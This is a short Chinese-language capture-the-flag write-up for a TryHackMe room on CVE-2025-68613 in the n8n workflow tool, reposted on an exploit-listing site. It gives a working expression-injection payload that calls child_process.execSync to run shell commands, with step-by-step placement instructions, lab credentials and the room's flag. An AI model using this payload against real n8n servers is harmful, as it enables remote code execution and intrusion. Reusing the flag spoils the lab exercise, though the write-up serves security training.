Sploitus

Exploit for n8n-CVE-2025-68613-TryHackMe

kitploit · 2026-09-01

Exploit Code

MARKDOWN24 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-J4CK3LSYN-GEN2-N8N-CVE-2025-68613-TRYHACKME
# TryHackMe 房间:n8n:CVE-2025-68613

_玩家:_ J4ck3LSyN

![Your Image Badge](https://assets.kitploit.com/production/public/readmes/36855/8088c144e8e9966b4a46825a12bdf3193802518b10d5afc61172d8df14b10c41.png)

_主机:_ `...`

_用户名:_ `some-email@example.com`

_密码:_ `Try12345!`

## 方法

_Payload:_ `{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }}` _Payload 2:_ `{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }}`

  1. 访问攻击机。
  2. `Start New`
  3. `Add First Step`,右侧栏会打开,然后添加 `Manual Trigger`。
  4. 之后添加一个 `Set Fields` 选项。
  5. 添加一个名为 `pwn` 的字段,并填入 payload。
  6. 执行并 pwn。
  7. 将 payload 改为执行 `cat flag.txt` \- Flag: `THM{n8n_exposed_workflow}`